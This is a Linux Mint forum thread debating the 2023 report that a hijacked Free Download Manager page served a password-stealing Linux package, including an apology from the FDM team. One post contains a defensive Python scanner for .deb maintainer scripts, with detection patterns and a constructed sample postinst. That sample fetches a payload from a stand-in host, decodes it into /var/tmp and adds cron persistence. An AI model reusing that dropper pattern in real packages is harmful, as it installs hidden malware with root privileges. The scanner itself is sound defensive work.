Password-stealing Linux malware served for 3 years and no one noticed

rambo919
Level 5
Posts: 673
Joined: Wed May 22, 2013 3:11 pm

Re: Password-stealing Linux malware served for 3 years and no one noticed

Post by rambo919 »

argentwolf wrote: Sun Sep 17, 2023 7:16 am Forethought is NOT downloading anything from a software server with an untrustworthy reputation, afterthought is attempting to cover a decision which may compromise your system (e.g., security suite)...common sense only shows in forethought. Think before, not after you click or hit enter!
The idea we can achieve a secure system ignoring the choices made by users on that system or within a domain is guaranteed to fail; integrity and security end at the moment where such intention deviates, regardless of platform. Too many assume Linux itself is a real-time security suite, therefore they can make questionable choices online (knowingly or unknowingly) and it has no consequence, but the patterns created always expose the painful habit in this mindset, and a collapse in system(s) or domain(s) integrity and security is assured. :shock: :shock: :shock:
This is basically the old folks tsking about the youngens and their dancing....
argentwolf
Level 4
Posts: 344
Joined: Wed Aug 22, 2018 5:24 am
Location: Holly Springs, NC

Re: Password-stealing Linux malware served for 3 years and no one noticed

Post by argentwolf »

rambo919 wrote: Sun Sep 17, 2023 8:20 am This is basically the old folks tsking about the youngens and their dancing....
No, it's exactly, but it is why our digital world is so compromised these days, across all industries and through all modalities. :wink: :wink: :wink:
Vanguard debian, because nothing's worse than doing nothing whimsically.
LMDE 6 | i7-4790 @ 3.60GHz x 8 CPU | 15.6GiB RAM | NVD9 1.9GiB GPU | 931GiB SSD | 298 GiB HD
LMDE 6| 2 Duo T5270 @ 1.40GHz x 2 CPU | 3.9GiB RAM | NV86 117MiB GPU | 465 GiB SSD
rambo919
Level 5
Posts: 673
Joined: Wed May 22, 2013 3:11 pm

Re: Password-stealing Linux malware served for 3 years and no one noticed

Post by rambo919 »

t42 wrote: Sun Sep 17, 2023 5:10 am What is a real-time security suite? How can I install it on Linux Mint? Is it something like the Kaspersky Internet Security suite produced by the company which the cited article referenced as a source? Is it Kaspersky, which was strangely not mentioned in security reviews like this one, The Best Security Suites for 2023? Is it the company which the US Federal Communications Commission banned for the unacceptable risk to the national security of the United States, forbidding companies from using FCC funds to purchase Kaspersky products?
How can Internet security be achieved in the Kaspersky edition? Simple: acting like a man in the middle, juggling certificates and reading all content before handing it to the OS.
Kaspersky does on occasion find things that no one else does.... keep in mind it was not one of the other players that found it. If everyone was paying attention it would probably have been found before, but generally no one pays attention to Linux binaries, nor do they develop products for Linux except on enterprise.... which is not something someone would use something like this for. Ad hominems won't do anything to delegitimize the legitimate work being done, even if by accident. The credibility of Kaspersky is beside the point; the point is it's them that found this and now FDM has a credibility problem the same way CCleaner does, that they are going to have to work real hard at fixing.... and no one willingly uses CCleaner anymore.

At a minimum a scanner prodding activity in passing with heuristics enabled would have flagged this which would have prodded extra attention. The strange false sense of security people live in by thinking they are not at risk of anything by sticking to walled gardens....is like never going to the doctor so you don't get cancer.

Even if a real time scanner and sandboxer is superfluous.... it only makes you less secure if the provider is doing it. People should stop doing the superiority complex dependency things that people make fun of Mac users for, it gives their arguments no credibility to the point where people outright ignore their self congratulatory ranting about inherent superiority. There is room as a buffer for a light real time malware scanner, it need not take up much resources as some providers have proven. The real problem is Linux generally has problems with not behaving like enterprise and it could easily be done badly in execution, I won't be surprised if someone tries to bake it into systemd at some point.... that's going to be FUN he says in dread.

It does no one any favours to go full "it's actually GNU/Linux" mode when something like this happens. Rather look at the problem, why it happens and how to avoid it.... instead of basically saying "you idiot, you kissed a girl and now she's pregnant and you got AIDS"..... it REALLY does not help anyone.
t42
Level 11
Posts: 3747
Joined: Mon Jan 20, 2014 6:48 pm

Re: Password-stealing Linux malware served for 3 years and no one noticed

Post by t42 »

It is not gonna take much imagination - try to be a normal user for the moment who needs to download several files and looks, as usual, for the 1st result:
[three attached screenshots of search results for the download]
edit: it is not a reply to the comment placed immediately above this one.
-=t42=-
rambo919
Level 5
Posts: 673
Joined: Wed May 22, 2013 3:11 pm

Re: Password-stealing Linux malware served for 3 years and no one noticed

Post by rambo919 »

argentwolf wrote: Sun Sep 17, 2023 8:31 am
rambo919 wrote: Sun Sep 17, 2023 8:20 am This is basically the old folks tsking about the youngens and their dancing....
No, it's exactly, but it is why our digital world is so compromised these days, across all industries and through all modalities. :wink: :wink: :wink:
Still the same problem, you are over correcting. See my post above.

There are outside-of-repo programs that have never given anyone any trouble and are not likely to do so. And not all of them are on github.

FreeFileSync for example....sure there is the flatpak version but it's basically useless given the sandboxing.
rambo919
Level 5
Posts: 673
Joined: Wed May 22, 2013 3:11 pm

Re: Password-stealing Linux malware served for 3 years and no one noticed

Post by rambo919 »

t42 wrote: Sun Sep 17, 2023 8:44 am It is not gonna take much imagination - try to be a normal user for the moment which needs do download several files and look, as usual, for the 1st result:
It's going to get worse actually, everyone must have noticed by now.... bots are taking over search results and there are not nearly as many search results for any given search anymore..... it's getting weird.
rambo919
Level 5
Posts: 673
Joined: Wed May 22, 2013 3:11 pm

Re: Password-stealing Linux malware served for 3 years and no one noticed

Post by rambo919 »

But to re-orient to the normal user.

If you want a download manager for Linux FDM still probably is the best option.

JDownloader is technically superior but it also has a more advanced workflow and less automation which won't work for most users.

uGet usually has ancient semi-useless versions in the repos and can be flaky.

Persepolis probably still flat out randomly crashes, no clue if they fixed that in mean time.

Both uGet and Persepolis pale in comparison to FDM regarding features.

Anyone that prefers cli downloading won't understand these concerns the same way a CEO does not understand his end users.... bubble separation.
argentwolf
Level 4
Posts: 344
Joined: Wed Aug 22, 2018 5:24 am
Location: Holly Springs, NC

Re: Password-stealing Linux malware served for 3 years and no one noticed

Post by argentwolf »

rambo919 wrote: Sun Sep 17, 2023 8:42 am superfluous....
Ah! Superfluous, Hypervigilant, and Redundant are my favorite shaming words. :wink: :wink: :wink:
The Muffin Man
Level 5
Posts: 716
Joined: Mon Jan 17, 2022 5:31 pm
Location: Drury Lane, NC

Re: Password-stealing Linux malware served for 3 years and no one noticed

Post by The Muffin Man »

rambo919 wrote: Sun Sep 17, 2023 1:13 am Literally no one said it's the fault of the OS.... at worst it's the fault of the mentality that real time security suites are useless. You are fighting windmills here.
Thanks for the clarification. For a minute there I thought you were blaming Linux for allowing FDM to steal passwords and calling it Malware.
"Go ahead. I don't shop here."
t42
Level 11
Posts: 3747
Joined: Mon Jan 20, 2014 6:48 pm

Re: Password-stealing Linux malware served for 3 years and no one noticed

Post by t42 »

rambo919 wrote: Sun Sep 17, 2023 8:42 am Kasperski does on occasion find things that no one else does....
exactly.

It's still not clear after reading the article what really happened.
1. This topic creates the false impression that there was an infected FDM application. There was none. FDM was and is a popular application for more than 15 years, though currently its usefulness for Linux users is debated.
2. According to Kaspersky's own article, one of the pages of the FDM website was compromised and on a random basis redirected users to the malicious domain, which served downloads of a valid FDM copy coupled with a malicious script. Exactly the same well-known incident happened with the Linux Mint website, which led to several downloads of tampered-with ISOs.
3. The malicious domain was registered in 2020 by the Eliza Heinig organization and is currently inactive.
4. There were no confirmed facts of infection except for several comments which may or may not have been caused by the malicious script.
5. Kaspersky's investigation was unusually pointed mostly back in time and brought out the issue after the malicious project was closed. As comments under Ars Technica's article said https://arstechnica.com/security/2023/0 ... comments=1:
"Since it was Kaspersky Labs who released this information, I'm also going to add my totally unsupported by definitive facts notion that this was malware developed by those friendly(ish) with Russia, and was already replaced with something more sinister, before Kaspersky said anything about it.
If you look at the time frames involved, that's more than enough time to run a targeted attack and keep the lines open to the point the malware has done the job it was intended to do and they can close up the server."
"Is that me being paranoid? Possibly. But in the spy game, anything is possible. And Kaspersky has been caught with its hand in that cookie jar one time more than it should have been."
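Point 2 above is the part a practitioner can act on: if the download is a valid copy "coupled with a malicious script", the place to look is the maintainer scripts inside the .deb, which dpkg runs as root at install time. The block below is an added example, not code from this thread, from Kaspersky or from the FDM project. It parses the .deb container (an `ar` archive holding `debian-binary`, `control.tar*` and `data.tar*`), pulls the preinst/postinst/prerm/postrm scripts out of the control tarball, and flags lines matching a handful of assumed dropper and persistence heuristics. The sample package it builds, the postinst inside it, and the hostname and paths in that postinst are constructed here for illustration and are not the real indicators from the incident.

```python
"""Inspect a .deb's maintainer scripts before installing it (added example).

A .deb is an `ar` archive; its control.tar* member carries the maintainer
scripts that dpkg runs as root. This parses the container, extracts those
scripts and flags suspicious lines. Heuristics and the sample package are
constructed for illustration, not real indicators of compromise.
"""
import io
import re
import sys
import tarfile

AR_MAGIC = b"!<arch>\n"
MAINT_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")

# (regex, reason) pairs: assumed heuristics, tune them for your environment.
SUSPICIOUS = [
    (r"\b(curl|wget)\b", "network fetch"),
    (r"\bbase64\s+(-d|--decode)\b", "base64 decode"),
    (r"\bcrontab\b|/etc/cron", "cron persistence"),
    (r"/var/tmp/|/dev/shm/", "world-writable drop dir"),
    (r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b", "marks file executable"),
    (r"\bnohup\b|\bsetsid\b|&\s*$", "detached background process"),
]


def ar_entries(blob):
    """Yield (member name, bytes) from a common-format ar archive."""
    if not blob.startswith(AR_MAGIC):
        raise ValueError("not an ar archive")
    pos = len(AR_MAGIC)
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]            # fixed 60-byte member header
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt ar member header")
        name = hdr[0:16].decode().rstrip().rstrip("/")
        size = int(hdr[48:58].decode().strip())
        yield name, blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size & 1)       # members are padded to even offsets


def maintainer_scripts(deb_blob):
    """Return {script name: text} for maintainer scripts found in control.tar*."""
    scripts = {}
    for name, data in ar_entries(deb_blob):
        if not name.startswith("control.tar"):
            continue
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
            for m in tf.getmembers():
                base = m.name.lstrip("./")
                if base in MAINT_SCRIPTS and m.isfile():
                    scripts[base] = tf.extractfile(m).read().decode(errors="replace")
    return scripts


def scan_scripts(scripts):
    """Return [(script, line number, reason, line)] for every heuristic hit."""
    findings = []
    for sname, text in scripts.items():
        for n, line in enumerate(text.splitlines(), 1):
            stripped = line.strip()
            if not stripped or stripped.startswith("#"):
                continue
            for pattern, reason in SUSPICIOUS:
                if re.search(pattern, line):
                    findings.append((sname, n, reason, stripped))
    return findings


# --- constructed sample .deb, standing in for a trojanised download -----------

def _ar_member(name, data):
    """Encode one ar member: name(16) mtime(12) uid(6) gid(6) mode(8) size(10)."""
    hdr = f"{name:<16}{'0':<12}{'0':<6}{'0':<6}{'100644':<8}{len(data):<10}"
    return hdr.encode() + b"`\n" + data + (b"\n" if len(data) % 2 else b"")


def build_sample_deb(postinst):
    """Build a minimal .deb whose control.tar.gz carries the given postinst."""
    control_txt = ("Package: sample-dlmgr\nVersion: 0\nArchitecture: all\n"
                   "Maintainer: nobody\nDescription: constructed sample\n")
    control = io.BytesIO()
    with tarfile.open(fileobj=control, mode="w:gz") as tf:
        for fname, body in (("control", control_txt), ("postinst", postinst)):
            raw = body.encode()
            ti = tarfile.TarInfo("./" + fname)
            ti.size, ti.mode = len(raw), 0o755
            tf.addfile(ti, io.BytesIO(raw))
    data = io.BytesIO()
    with tarfile.open(fileobj=data, mode="w:gz"):
        pass                                 # an empty payload is enough here
    return (AR_MAGIC
            + _ar_member("debian-binary", b"2.0\n")
            + _ar_member("control.tar.gz", control.getvalue())
            + _ar_member("data.tar.gz", data.getvalue()))


# Hypothetical dropper postinst (constructed; host and paths are not real IOCs).
SAMPLE_POSTINST = """#!/bin/sh
set -e
update-desktop-database || true
mkdir -p /var/tmp/.cache-x
curl -fsSL http://updates.example.invalid/p | base64 -d > /var/tmp/.cache-x/svc
chmod +x /var/tmp/.cache-x/svc
( crontab -l 2>/dev/null; echo "*/10 * * * * /var/tmp/.cache-x/svc" ) | crontab -
exit 0
"""


def main(argv):
    """Scan the .deb given on the command line, or the constructed sample."""
    blob = open(argv[1], "rb").read() if len(argv) > 1 else build_sample_deb(SAMPLE_POSTINST)
    for sname, n, reason, line in scan_scripts(maintainer_scripts(blob)):
        print(f"{sname}:{n}: {reason}: {line}")


if __name__ == "__main__":
    main(sys.argv)
```

Run it with no argument to see the constructed sample flagged, or pass a downloaded .deb. On a real file `dpkg-deb -e pkg.deb ctrl` extracts the same scripts for reading by hand; the point is that whatever is in them runs with root privileges the moment `dpkg -i` is typed, which is why a package fetched through a redirect from the vendor's own site still deserves a look before installing.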
argentwolf
Level 4
Posts: 344
Joined: Wed Aug 22, 2018 5:24 am
Location: Holly Springs, NC

Re: Password-stealing Linux malware served for 3 years and no one noticed

Post by argentwolf »

Yeah, let's go back 15+ years and I'd argue the binary compromise began when companies allowed and suggested BYOD; security intentionally has been a losing afterthought in our digital realm from that point forward, and everyone's been shot blasting at their privacy and whining loudly ever since. Bad Robot! :evil: :evil: :evil:

"What is BYOD (bring your own device)?"
https://www.ibm.com/topics/byod
rambo919
Level 5
Posts: 673
Joined: Wed May 22, 2013 3:11 pm

Re: Password-stealing Linux malware served for 3 years and no one noticed

Post by rambo919 »

t42 wrote: Sun Sep 17, 2023 11:31 am "Is that me being paranoid? Possibly. But in the spy game, anything is possible. And Kapersky has been caught with its hand in that cookie jar one time more than it should have been."
The big problem here is the FDM team are admitting to having been caught with their pants down.... or are you accusing Kaspersky of hacking them?
t42
Level 11
Posts: 3747
Joined: Mon Jan 20, 2014 6:48 pm

Re: Password-stealing Linux malware served for 3 years and no one noticed

Post by t42 »

rambo919 wrote: Sun Sep 17, 2023 12:40 pm The big problem here is the FDM team are admitting to having been caught
So this is a big problem now? What is this topic about?
What has it to do with Linux Mint? There is a norm in Linux and it is up to you to follow it:
It is strongly suggested to use a package manager like aptitude or synaptic to download and install packages, instead of doing so manually.
The FDM team have no clue what is going on. Just read their appeal to Kaspersky asking to educate them. Clearly they just panicked.
MurphCID
Level 15
Posts: 5910
Joined: Fri Sep 25, 2015 10:29 pm
Location: Near San Antonio, Texas

Re: Password-stealing Linux malware served for 3 years and no one noticed

Post by MurphCID »

argentwolf wrote: Sun Sep 17, 2023 12:29 pm Yeah, let's go back 15+ years and I'd argue the binary compromise began when companies allowed and suggested BYOD; security intentionally has been a losing afterthought in our digital realm from that point forward, and everyone's been shot blasting at their privacy and whining loudly ever since. Bad Robot! :evil: :evil: :evil:

"What is BYOD (bring your own device)?"
https://www.ibm.com/topics/byod
BYOD is and always has been a bad idea. Now I cannot be a complete hypocrite since I used my personal phone at work, to do work related stuff a lot even though I had been issued an iPhone. It was just "easier". But laptops, and other computers, IMHO, bad idea. We were not allowed to use personal devices for work, ever. The penalties were strict for that. Plus using your own could cost you a court case, which was a "Bad Thing". Still if they knew of the issue, and did not fix it shame on them.
FDM_Team
Level 1
Posts: 2
Joined: Thu Sep 14, 2023 11:32 am

Re: Password-stealing Linux malware served for 3 years and no one noticed

Post by FDM_Team »

Greetings from the Free Download Manager team! Here is our latest update regarding the issue. We have created a bash script that you can use to check the presence of the malware in your system. Please review our instructions on our official page: https://www.freedownloadmanager.org/blog/?p=664
We once again sincerely apologize for any inconvenience that might have been caused.
The Muffin Man
Level 5
Posts: 716
Joined: Mon Jan 17, 2022 5:31 pm
Location: Drury Lane, NC

Re: Password-stealing Linux malware served for 3 years and no one noticed

Post by The Muffin Man »

I think "blindly" running bash scripts is the way most malware gets installed. (YMMV)
rambo919
Level 5
Posts: 673
Joined: Wed May 22, 2013 3:11 pm

Re: Password-stealing Linux malware served for 3 years and no one noticed

Post by rambo919 »

The Muffin Man wrote: Thu Sep 21, 2023 8:04 am I think "blindly" running bash scripts is the way most malware gets installed. (YMMV)
Do you find anything malicious in the provided script?
The Muffin Man
Level 5
Posts: 716
Joined: Mon Jan 17, 2022 5:31 pm
Location: Drury Lane, NC

Re: Password-stealing Linux malware served for 3 years and no one noticed

Post by The Muffin Man »

No.
My point (and I do have one) is that if someone relied on FDM for installing software rather than the built-in Debian/Ubuntu/Mint ways, then they'll probably just run the script without examining it, too.
rambo919
Level 5
Posts: 673
Joined: Wed May 22, 2013 3:11 pm

Re: Password-stealing Linux malware served for 3 years and no one noticed

Post by rambo919 »

The Muffin Man wrote: Fri Sep 22, 2023 7:42 am No.
My point (and I do have one) is that if someone relied on FDM for installing software rather than the built-in Debian/Ubuntu/Mint ways, then they'll probably just run the script without examining it, too.
Given that there exists no real 1:1 alternative in your preferred channels for what FDM does..... is your point not simply ideological slander at this point?

This is not much different from a discord user shaming an IRC user or the other way around. Different people do things in different ways.

However you do have half a point, at least half of FDM users being not highly technically literate won't even know a malicious script if they read one. FDM after all is primarily a normal user friendly solution not an advanced user solution.... and it's more stable and reliable than the normal user friendly solutions in your preferred channels.

The thing here is.... just because you live your digital life inside of FOSS does not mean anyone else does. There exists a great big wild world outside of the oddly religious FOSS orthodoxy and expecting everyone to live within your preferred walled garden is just plain narrow-minded.... at best you are being a Dettol mom here and at worst an elitist snob.... whose snide remarks impress absolutely no one at best actually drive people away from Linux because they really don't want to join another cult. Don't be a bully is good advice for anyone.

I am the annoying figure that sees both FDM and everything other than JDownloader (hardly perfect either) as regressive and restrictive in many ways but I really see no reason to begrudge people their choices. The only real sin of FDM is IMO their obsession with touch interfaces (because it's "modern") that really should have been optional rather than mandatory but there are people that want such applications so more power to them.

Incidentally, downloading something from a browser is a recipe for pain if you have a slow or unstable connection, something that people with fast stable connections forget. It's even more of a pain when you have a long queue of downloads to do.

Lastly.... should people that want to gatekeep Linux to ensure that the normies don't come in and paint the walls or something not stick to using Arch? Just a general thought.
rambo919
Level 5
Posts: 673
Joined: Wed May 22, 2013 3:11 pm

Re: Password-stealing Linux malware served for 3 years and no one noticed

Post by rambo919 »

FDM_Team wrote: Thu Sep 21, 2023 5:08 am Greetings from the Free Download Manager team! Here is our latest update regarding the issue. We have created a bash script that you can use to check the presence of the malware in your system. Please review our instructions on our official page: https://www.freedownloadmanager.org/blog/?p=664
We once again sincerely apologize for any inconvenience that might have been caused.
While I don't agree with your philosophy regarding your software, as should be clear by my posts, I for one commend you for your surprising presence here and your humility in the resolution of the problem.

Though I have outgrown it I have in the past found FDM to be very useful to me.